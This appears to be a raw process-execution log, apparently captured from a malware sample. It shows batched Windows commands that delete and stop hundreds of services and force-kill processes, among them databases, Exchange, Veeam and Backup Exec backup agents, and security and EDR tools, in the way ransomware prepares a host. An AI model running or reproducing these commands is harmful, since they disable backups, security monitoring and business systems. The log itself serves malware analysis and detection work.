12616 -
sc.exe sc delete OracleJobSchedulerORCL
12920 -
sc.exe sc delete OracleMTSRecoveryService
12656
-
-
cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
7996-
sc.exe sc delete OracleOraDb11g_home1ClrAgent
7232 -
sc.exe sc delete OracleOraDb11g_home1TNSListener
8176 -
sc.exe sc delete OracleVssWriterORCL
7592 -
sc.exe sc delete OracleServiceORCL
8676 -
sc.exe sc delete aspnet_state @sc delete Redis
8272 -
sc.exe sc delete OracleVssWriterORCL
2424 -
sc.exe sc delete JhTask
1460 -
sc.exe sc delete ImeDictUpdateService
7324 -
sc.exe sc delete XT800Service_Personal
9616 -
sc.exe sc delete MCService
10128 -
sc.exe sc delete ImeDictUpdateService
9500 -
sc.exe sc delete allpass_redisservice_port21160
10108 -
sc.exe sc delete "Flash Helper Service"
9956 -
sc.exe sc delete "Kiwi Syslog Server"
9716 -
sc.exe sc delete "UWS HiPriv Services"
9652
-
-
cmd.exe cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
8124-
sc.exe sc delete "UWS LoPriv Services"
7360 -
sc.exe sc delete ftnlsv3
7452 -
sc.exe sc delete ftnlses3
7364 -
sc.exe sc delete FxService
8836 -
sc.exe sc delete "UtilDev Web Server Pro"
9112 -
sc.exe sc delete ftusbrdwks
9092 -
sc.exe sc delete ftusbrdsrv
8896 -
sc.exe sc delete "ZTE USBIP Client Guard"
9580 -
sc.exe sc delete "ZTE USBIP Client"
10000 -
sc.exe sc delete "ZTE FileTranS"
9084 -
sc.exe sc delete wwbizsrv
9448 -
sc.exe sc delete qemu-ga
9304 -
sc.exe sc delete AlibabaProtect
7708 -
sc.exe sc delete ZTEVdservice
9056 -
sc.exe sc delete kbasesrv
10056 -
sc.exe sc delete MMRHookService
10576 -
sc.exe sc delete OracleJobSchedulerORCL
11020 -
sc.exe sc delete IpOverUsbSvc
10344 -
sc.exe sc delete MsDtsServer100
11152 -
sc.exe sc delete KuaiYunTools
10680 -
sc.exe sc delete KMSELDI
9984 -
sc.exe sc delete btPanel
10232 -
sc.exe sc delete Protect_2345Explorer
11284 -
sc.exe sc delete 2345PicSvc
11612 -
sc.exe sc delete vmware-converter-agent
12080 -
sc.exe sc delete vmware-converter-server
11476 -
sc.exe sc delete vmware-converter-worker
10624 -
sc.exe sc delete QQCertificateService
11896 -
sc.exe sc delete OracleRemExecService
11292 -
sc.exe sc delete GPSDaemon
11312 -
sc.exe sc delete GPSUserSvr
12332 -
sc.exe sc delete GPSDownSvr
12744 -
sc.exe sc delete GPSStorageSvr
13272 -
sc.exe sc delete GPSDataProcSvr
12620 -
sc.exe sc delete GPSGatewaySvr
12444 -
sc.exe sc delete GPSMediaSvr
12476 -
sc.exe sc delete GPSLoginSvr
12940 -
sc.exe sc delete GPSTomcat6
12584 -
sc.exe sc delete GPSMysqld
13224 -
sc.exe sc delete GPSFtpd
13164 -
sc.exe sc delete "Zabbix Agent"
13344 -
sc.exe sc delete BackupExecAgentAccelerator
13648 -
sc.exe sc delete bedbg
14100 -
sc.exe sc delete BackupExecDeviceMediaService
13452 -
sc.exe sc delete BackupExecRPCService
13728 -
sc.exe sc delete BackupExecAgentBrowser
12348 -
sc.exe sc delete BackupExecJobEngine
13968 -
sc.exe sc delete BackupExecManagementService
13360 -
sc.exe sc delete MDM
2588 -
sc.exe sc delete TxQBService
13792 -
sc.exe sc delete Gailun_Downloader
14436 -
sc.exe sc delete RemoteAssistService
14728 -
sc.exe sc delete YunService
14952 -
sc.exe sc delete Serv-U
14516 -
sc.exe sc delete "EasyFZS Server"
14936 -
sc.exe sc delete "Rpc Monitor"
14640 -
sc.exe sc delete OpenFastAssist
14620 -
sc.exe sc delete "Nuo Update Monitor"
14116 -
sc.exe sc delete "Daemon Service"
15280 -
sc.exe sc delete asComSvc
15244 -
sc.exe sc delete OfficeUpdateService
14864
-
-
cmd.exe cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
7208-
sc.exe sc delete MSCRMAsyncService
7752 -
sc.exe sc delete REPLICA
7488 -
sc.exe sc delete RTCATS
7504 -
sc.exe sc delete RTCAVMCU
8632 -
sc.exe sc delete RtcQms
8316 -
sc.exe sc delete RTCMEETINGMCU
9160 -
sc.exe sc delete RTCIMMCU
9020 -
sc.exe sc delete RTCDATAMCU
9468 -
sc.exe sc delete RTCCDR
10032 -
sc.exe sc delete ProjectEventService16
9608 -
sc.exe sc delete ProjectQueueService16
9416 -
sc.exe sc delete SPAdminV4
8360 -
sc.exe sc delete SPSearchHostController
9888 -
sc.exe sc delete SPTimerV4
10452 -
sc.exe sc delete SPTraceV4
10856 -
sc.exe sc delete OSearch16
11184 -
sc.exe sc delete ProjectCalcService16
10868 -
sc.exe sc delete c2wts
7180 -
sc.exe sc delete AppFabricCachingService
11028 -
sc.exe sc delete ADWS
10500 -
sc.exe sc delete MotionBoard57
10244 -
sc.exe sc delete MotionBoardRCService57
11248 -
sc.exe sc delete vsvnjobsvc
11444 -
sc.exe sc delete VisualSVNServer
11880 -
sc.exe sc delete "FlexNet Licensing Service 64"
12256 -
sc.exe sc delete BestSyncSvc
11552 -
sc.exe sc delete LPManager
11668 -
sc.exe sc delete MediatekRegistryWriter
11488 -
sc.exe sc delete RaAutoInstSrv_RT2870
11088 -
sc.exe sc delete CobianBackup10
12048 -
sc.exe sc delete SQLANYs_sem5
12420 -
sc.exe sc delete CASLicenceServer
12640 -
sc.exe sc delete SQLService
12908 -
sc.exe sc delete semwebsrv
12308 -
sc.exe sc delete TbossSystem
12848 -
sc.exe sc delete ErpEnvSvc
13172 -
sc.exe sc delete Mysoft.Autoupgrade.DispatchService
13072 -
sc.exe sc delete Mysoft.Autoupgrade.UpdateService
13080 -
sc.exe sc delete Mysoft.Config.WindowsService
11744 -
sc.exe sc delete Mysoft.DataCenterService
12396 -
sc.exe sc delete Mysoft.SchedulingService
13476 -
sc.exe sc delete Mysoft.Setup.InstallService
13904 -
sc.exe sc delete MysoftUpdate
14200 -
sc.exe sc delete edr_monitor
13308 -
sc.exe sc delete abs_deployer
13368 -
sc.exe sc delete savsvc
14168 -
sc.exe sc delete ShareBoxMonitorService
13908 -
sc.exe sc delete ShareBoxService
13628 -
sc.exe sc delete CloudExchangeService
12972 -
sc.exe sc delete "U8WorkerService2"
13580 -
sc.exe sc delete CIS
14376 -
sc.exe sc delete EASService
14596 -
sc.exe sc delete KICkSvr
14868 -
sc.exe sc delete "OSP Service"
15148 -
sc.exe sc delete U8SmsSrv
14588 -
sc.exe sc delete OfficeClearCache
15060 -
sc.exe sc delete TurboCRM70
15316 -
sc.exe sc delete U8DispatchService
15296 -
sc.exe sc delete U8EISService
14984 -
sc.exe sc delete U8EncryptService
14872 -
sc.exe sc delete U8GCService
14956 -
sc.exe sc delete U8KeyManagePool
15440
-
-
cmd.exe cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
7500-
-
net1.exe C:\Windows\system32\net1 stop U8WorkerService1
8040
-
-
-
net1.exe C:\Windows\system32\net1 stop U8WorkerService2
8208
-
-
-
net1.exe C:\Windows\system32\net1 stop "memcached Server"
8488
-
-
-
net1.exe C:\Windows\system32\net1 stop Apache2.4
9744
-
-
-
net1.exe C:\Windows\system32\net1 stop UFIDAWebService
9788
-
-
-
net1.exe C:\Windows\system32\net1 stop MSComplianceAudit
8924
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeADTopology
10472
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
10252
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeCompliance
10640
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeDagMgmt
10800
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeDelivery
288
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeDiagnostics
11844
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeEdgeSync
11408
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeFastSearch
12236
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
11344
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeHM
12824
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SQL2008
12660
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeHMRecovery
13228
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeImap4
13108
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeIMAP4BE
12820
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeIS
14012
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
500
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMailboxReplication
13488
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
14280
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangePop3
14000
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangePOP3BE
14676
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeRepl
14244
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeRPC
14592
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeServiceHost
15320
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeSubmission
15328
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeThrottling
15396
-
-
-
cmd.exe cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
7608-
-
net1.exe C:\Windows\system32\net1 stop HaoZipSvc
8260
-
-
-
net1.exe C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
7968
-
-
-
net1.exe C:\Windows\system32\net1 stop Realtek11nSU
8768
-
-
-
net1.exe C:\Windows\system32\net1 stop xenlite
10052
-
-
-
net1.exe C:\Windows\system32\net1 stop XenSvc
8884
-
-
-
net1.exe C:\Windows\system32\net1 stop Apache2.2
8344
-
-
-
net1.exe C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
10548
-
-
-
net1.exe C:\Windows\system32\net1 stop DellDRLogSvc
11224
-
-
-
net1.exe C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
10312
-
-
-
net1.exe C:\Windows\system32\net1 stop JWEM3DBAUTORun
11240
-
-
-
net1.exe C:\Windows\system32\net1 stop JWRinfoClientService
10608
-
-
-
net1.exe C:\Windows\system32\net1 stop JWService
11648
-
-
-
net1.exe C:\Windows\system32\net1 stop Service2
11580
-
-
-
net1.exe C:\Windows\system32\net1 stop RapidRecoveryAgent
11544
-
-
-
net1.exe C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
11848
-
-
-
net1.exe C:\Windows\system32\net1 stop AdobeARMservice
12384
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc
12292
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeanBackupSvc
13116
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc
11720
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdAppService1300
12600
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdTaskService1300
13412
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
14052
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdWebService1300
12484
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc
11756
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc
11496
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc
13924
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamMountSvc
14772
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc
14396
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDistributionSvc
14284
-
-
-
net1.exe C:\Windows\system32\net1 stop tmlisten
14452
-
-
-
net1.exe C:\Windows\system32\net1 stop ServiceMid
12968
-
-
-
cmd.exe cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
8088-
-
net1.exe C:\Windows\system32\net1 stop UIODetect
8484
-
-
-
net1.exe C:\Windows\system32\net1 stop VMwareHostd
8920
-
-
-
net1.exe C:\Windows\system32\net1 stop TeamViewer8
8412
-
-
-
net1.exe C:\Windows\system32\net1 stop VMUSBArbService
9792
-
-
-
net1.exe C:\Windows\system32\net1 stop VMAuthdService
9672
-
-
-
net1.exe C:\Windows\system32\net1 stop wanxiao-monitor
8892
-
-
-
net1.exe C:\Windows\system32\net1 stop WebAttendServer
10068
-
-
-
net1.exe C:\Windows\system32\net1 stop mysqltransport
10876
-
-
-
net1.exe C:\Windows\system32\net1 stop VMnetDHCP
9504
-
-
-
net1.exe C:\Windows\system32\net1 stop "VMware NAT Service"
11008
-
-
-
net1.exe C:\Windows\system32\net1 stop Tomcat8
2528
-
-
-
net1.exe C:\Windows\system32\net1 stop TeamViewer
11760
-
-
-
net1.exe C:\Windows\system32\net1 stop QPCore
11536
-
-
-
net1.exe C:\Windows\system32\net1 stop CASLicenceServer
1272
-
-
-
net1.exe C:\Windows\system32\net1 stop CASWebServer
11328
-
-
-
net1.exe C:\Windows\system32\net1 stop AutoUpdateService
12340
-
-
-
net1.exe C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
13012
-
-
-
net1.exe C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
12956
-
-
-
net1.exe C:\Windows\system32\net1 stop "AliyunService"
2360
-
-
-
net1.exe C:\Windows\system32\net1 stop CASXMLService
13264
-
-
-
net1.exe C:\Windows\system32\net1 stop AGSService
13092
-
-
-
net1.exe C:\Windows\system32\net1 stop RapService
13964
-
-
-
net1.exe C:\Windows\system32\net1 stop DDNSService
13420
-
-
-
net1.exe C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
14268
-
-
-
net1.exe C:\Windows\system32\net1 stop CASVirtualDiskService
14028
-
-
-
net1.exe C:\Windows\system32\net1 stop CASMsgSrv
14204
-
-
-
net1.exe C:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"
14340
-
-
-
net1.exe C:\Windows\system32\net1 stop OracleDBConsoleilas
14916
-
-
-
net1.exe C:\Windows\system32\net1 stop MySQL
14652
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdAppService1220
15228
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdTaskService1220
3040
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdUpgradeService1220
13872
-
-
net.exe net stop K3MobileServiceManage
15376
-
-
cmd.exe cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
7196-
taskkill.exe taskkill /IM sqlservr.exe /F
8152 -
taskkill.exe taskkill /IM httpd.exe /F
9140 -
taskkill.exe taskkill /IM java.exe /F
10136 -
taskkill.exe taskkill /IM fdhost.exe /F
8868 -
taskkill.exe taskkill /IM fdlauncher.exe /F
11252 -
taskkill.exe taskkill /IM reportingservicesservice.exe /F
10528 -
taskkill.exe taskkill /IM softmgrlite.exe /F
11796 -
taskkill.exe taskkill /IM sqlbrowser.exe /F
11696 -
taskkill.exe taskkill /IM ssms.exe /F
13192 -
taskkill.exe taskkill /IM vmtoolsd.exe /F
12852 -
taskkill.exe taskkill /IM baidunetdisk.exe /F
13596 -
taskkill.exe taskkill /IM yundetectservice.exe /F
13804 -
taskkill.exe taskkill /IM ssclient.exe /F
13100 -
taskkill.exe taskkill /IM GNAupdaemon.exe /F
15276 -
taskkill.exe taskkill /IM RAVCp164.exe /F
14504
-
-
cmd.exe cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F 